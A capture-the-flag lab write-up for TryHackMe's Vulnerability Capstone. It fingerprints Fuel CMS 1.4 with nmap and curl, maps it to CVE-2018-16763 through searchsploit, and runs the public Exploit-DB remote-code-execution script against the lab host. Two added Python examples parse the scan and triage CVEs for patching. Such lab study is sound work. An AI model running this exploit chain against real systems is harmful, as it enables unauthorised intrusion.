THM – Vulnerability Capstone
What is the name of the application running on the vulnerable machine?
Start by scanning the usual ports:

```
┌──(v4ler1an㉿kali)-[~]
└─$ sudo nmap -sV -T4 -Pn 10.10.217.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-05 01:33 EST
Nmap scan report for localhost (10.10.217.113)
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.22 seconds
```
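The scan output above is the starting inventory for the host. The following is an added example (not code from the writeup or from nmap) that parses a constructed copy of that `nmap -sV` output into service records, lists the web services worth fingerprinting next, and reports open ports that fall outside an approved baseline. The function names and the baseline port set are my own assumptions.

```python
from __future__ import annotations
import re

# Constructed sample: the "nmap -sV" output shown in the writeup, abridged.
SAMPLE_NMAP = """\
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-05 01:33 EST
Nmap scan report for localhost (10.10.217.113)
Host is up (0.36s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
"""

HOST_LINE = re.compile(r"^Nmap scan report for (\S+)(?: \(([\d.]+)\))?")
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


def parse_nmap(text: str) -> list[dict]:
    """Parse normal-format nmap -sV output into one record per port line."""
    host = None
    records = []
    for line in text.splitlines():
        h = HOST_LINE.match(line)
        if h:
            host = h.group(2) or h.group(1)  # prefer the IP given in parentheses
            continue
        m = PORT_LINE.match(line)
        if m:
            port, proto, state, service, version = m.groups()
            records.append({
                "host": host, "port": int(port), "proto": proto, "state": state,
                "service": service, "version": (version or "").strip(),
            })
    return records


def unexpected_exposure(records: list[dict], expected_ports: set[int]) -> list[int]:
    """Open ports that are not in the host's approved baseline (baseline is hypothetical)."""
    return sorted(r["port"] for r in records
                  if r["state"] == "open" and r["port"] not in expected_ports)


def web_targets(records: list[dict]) -> list[str]:
    """URLs worth fingerprinting further: every open http/https port."""
    return [f"{r['service']}://{r['host']}:{r['port']}/"
            for r in records if r["state"] == "open" and r["service"] in ("http", "https")]


if __name__ == "__main__":
    recs = parse_nmap(SAMPLE_NMAP)
    for r in recs:
        print(f"{r['host']}:{r['port']}/{r['proto']} {r['state']} {r['service']} {r['version']}")
    print("web targets:", web_targets(recs))
    print("outside baseline {22}:", unexpected_exposure(recs, {22}))
```

Feeding the real scan in is a matter of `nmap -sV ... -oN scan.txt` and reading that file; the same parser applies, since `-oN` is the normal format shown above.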
Ports 80 and 22 are open; look at port 80 first:

```
┌──(v4ler1an㉿kali)-[~]
└─$ sudo nmap --script=http-headers -p80 10.10.217.113
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-05 01:35 EST
Nmap scan report for localhost (10.10.217.113)
Host is up (0.43s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-headers:
|   Date: Tue, 05 Mar 2024 06:35:42 GMT
|   Server: Apache/2.4.41 (Ubuntu)
|   Connection: close
|   Content-Type: text/html; charset=UTF-8
|
|_  (Request type: HEAD)

Nmap done: 1 IP address (1 host up) scanned in 2.82 seconds
```
It is running Apache; fetch the page directly:

```
┌──(v4ler1an㉿kali)-[~]
└─$ curl http://10.10.217.113
<!DOCTYPE html>
<html lang="en-US">
<head>
... ...
<h1>Welcome to Fuel CMS</h1>
<h2>Version 1.4</h2>
... ...
```

It is running Fuel CMS, version 1.4.
What is the version number of this application?
1.4
What is the number of the CVE that allows an attacker to remotely execute code on this application?
Search with searchsploit:

```
┌──(v4ler1an㉿kali)-[~]
└─$ searchsploit fuel |grep 1.4
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)        | php/webapps/50523.txt
fuel CMS 1.4.1 - Remote Code Execution (1)                         | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2)                         | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3)                         | php/webapps/50477.py
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)               | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)   | php/webapps/48778.txt

┌──(v4ler1an㉿kali)-[~]
└─$ searchsploit -p 47138
  Exploit: fuel CMS 1.4.1 - Remote Code Execution (1)
      URL: https://www.exploit-db.com/exploits/47138
     Path: /usr/share/exploitdb/exploits/linux/webapps/47138.py
    Codes: CVE-2018-16763
 Verified: False
File Type: Python script, ASCII text executable

┌──(v4ler1an㉿kali)-[~]
└─$ searchsploit -p 49487
  Exploit: Fuel CMS 1.4.1 - Remote Code Execution (2)
      URL: https://www.exploit-db.com/exploits/49487
     Path: /usr/share/exploitdb/exploits/php/webapps/49487.rb
    Codes: CVE-2018-16763
 Verified: False
File Type: Ruby script, ASCII text

┌──(v4ler1an㉿kali)-[~]
└─$ searchsploit -p 50477
  Exploit: Fuel CMS 1.4.1 - Remote Code Execution (3)
      URL: https://www.exploit-db.com/exploits/50477
     Path: /usr/share/exploitdb/exploits/php/webapps/50477.py
    Codes: CVE-2018-16763
 Verified: False
File Type: Python script, ASCII text executable
```

So it is CVE-2018-16763.
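The two steps above, reading the version out of the welcome page and mapping it to Exploit-DB entries and their CVE codes, are the kind of check a vulnerability-management job repeats for every exposed web application. The following is an added example, not code from the writeup, from Fuel CMS or from searchsploit: it parses constructed copies of the `curl` and `searchsploit` output shown here and reports which CVEs the observed version needs patching for. The function names and the prefix rule (a banner like "1.4" that omits the patch level is treated as matching any 1.4.x entry) are my own assumptions.

```python
from __future__ import annotations
import re
from typing import Optional

# Constructed sample inputs, modelled on the curl and searchsploit output in the writeup.
SAMPLE_HTML = """<!DOCTYPE html>
<html lang="en-US">
<head><title>Fuel CMS</title></head>
<body>
<h1>Welcome to Fuel CMS</h1>
<h2>Version 1.4</h2>
</body>
</html>
"""

SAMPLE_LISTING = """\
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated) | php/webapps/50523.txt
fuel CMS 1.4.1 - Remote Code Execution (1) | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2) | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3) | php/webapps/50477.py
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated) | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated) | php/webapps/48778.txt
"""

# "searchsploit -p <id>" output per Exploit-DB id (only the RCE entries, as in the writeup).
SAMPLE_DETAILS = {
    "47138": "Exploit: fuel CMS 1.4.1 - Remote Code Execution (1)\nCodes: CVE-2018-16763\nVerified: False\n",
    "49487": "Exploit: Fuel CMS 1.4.1 - Remote Code Execution (2)\nCodes: CVE-2018-16763\nVerified: False\n",
    "50477": "Exploit: Fuel CMS 1.4.1 - Remote Code Execution (3)\nCodes: CVE-2018-16763\nVerified: False\n",
}


def fingerprint(html: str) -> Optional[tuple[str, str]]:
    """Pull (product, version) out of the Fuel CMS welcome page, or None if absent."""
    prod = re.search(r"<h1>\s*Welcome to\s+(.+?)\s*</h1>", html, re.I)
    ver = re.search(r"<h2>\s*Version\s+(\d+(?:\.\d+)*)\s*</h2>", html, re.I)
    if not prod or not ver:
        return None
    return prod.group(1), ver.group(1)


def version_tuple(v: str) -> tuple[int, ...]:
    return tuple(int(p) for p in v.split("."))


def version_compatible(observed: str, entry: str) -> bool:
    """Prefix rule (assumption): a banner such as "1.4" hides the patch level, so it is
    compatible with 1.4.1 and 1.4.13 alike, while a full "1.4.2" does not match 1.4.1."""
    o, e = version_tuple(observed), version_tuple(entry)
    return e[:len(o)] == o


def parse_listing(listing: str) -> list[dict]:
    """Parse "title | path" lines from searchsploit into dicts with version and EDB id."""
    entries = []
    for line in listing.splitlines():
        if "|" not in line:
            continue
        title, path = (part.strip() for part in line.split("|", 1))
        ver = re.search(r"\b(\d+(?:\.\d+)+)\b", title)
        edb = re.search(r"(\d+)\.\w+$", path)
        if not ver or not edb:
            continue
        entries.append({
            "title": title, "version": ver.group(1), "path": path, "id": edb.group(1),
            "rce": "remote code execution" in title.lower(),
        })
    return entries


def parse_codes(detail: str) -> list[str]:
    """Extract the identifiers from the "Codes:" line of "searchsploit -p" output."""
    for line in detail.splitlines():
        if line.startswith("Codes:"):
            return [c.strip() for c in line.split(":", 1)[1].split(";") if c.strip()]
    return []


def triage(html: str, listing: str, details: dict) -> dict:
    """Match the fingerprinted version against the listing and collect the RCE CVEs."""
    fp = fingerprint(html)
    if fp is None:
        return {"product": None, "version": None, "candidates": [], "rce_cves": []}
    product, version = fp
    candidates = [e for e in parse_listing(listing) if version_compatible(version, e["version"])]
    cves = sorted({c for e in candidates if e["rce"]
                   for c in parse_codes(details.get(e["id"], ""))})
    return {"product": product, "version": version, "candidates": candidates, "rce_cves": cves}


if __name__ == "__main__":
    result = triage(SAMPLE_HTML, SAMPLE_LISTING, SAMPLE_DETAILS)
    print(f"{result['product']} {result['version']}: {len(result['candidates'])} candidate entries")
    for entry in result["candidates"]:
        print("  ", entry["title"], "->", entry["path"])
    print("RCE CVEs to patch for:", ", ".join(result["rce_cves"]))
```

The prefix rule is deliberately conservative: a page that only says "1.4" cannot tell 1.4.1 from 1.4.13, so every 1.4.x entry stays on the candidate list and the exact patch level has to be confirmed from the deployed files or the vendor changelog before the finding is closed.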
What is the value of the flag located on this vulnerable machine? This is located in /home/ubuntu on the vulnerable machine.
Use the exploit found above directly:

```
┌──(v4ler1an㉿kali)-[~]
└─$ python3 /usr/share/exploitdb/exploits/php/webapps/50477.py --help
usage: python3 /usr/share/exploitdb/exploits/php/webapps/50477.py -u <url>

fuel cms fuel CMS 1.4.1 - Remote Code Execution Exploit

options:
  -h, --help         show this help message and exit
  -v, --version      show the version of exploit
  -u url, --url url  Enter the url

EXAMPLE - python3 /usr/share/exploitdb/exploits/php/webapps/50477.py -u http://10.10.21.74

┌──(v4ler1an㉿kali)-[~]
└─$ python3 /usr/share/exploitdb/exploits/php/webapps/50477.py -u http://10.10.217.113/
[+]Connecting...
Enter Command $id
system
Enter Command $cd /
system
Enter Command $ls
system
```

It ran successfully, but the command output echo was a bit off. That has nothing to do with the exercise itself, so I ignored it; switching to the official attack environment got the flag.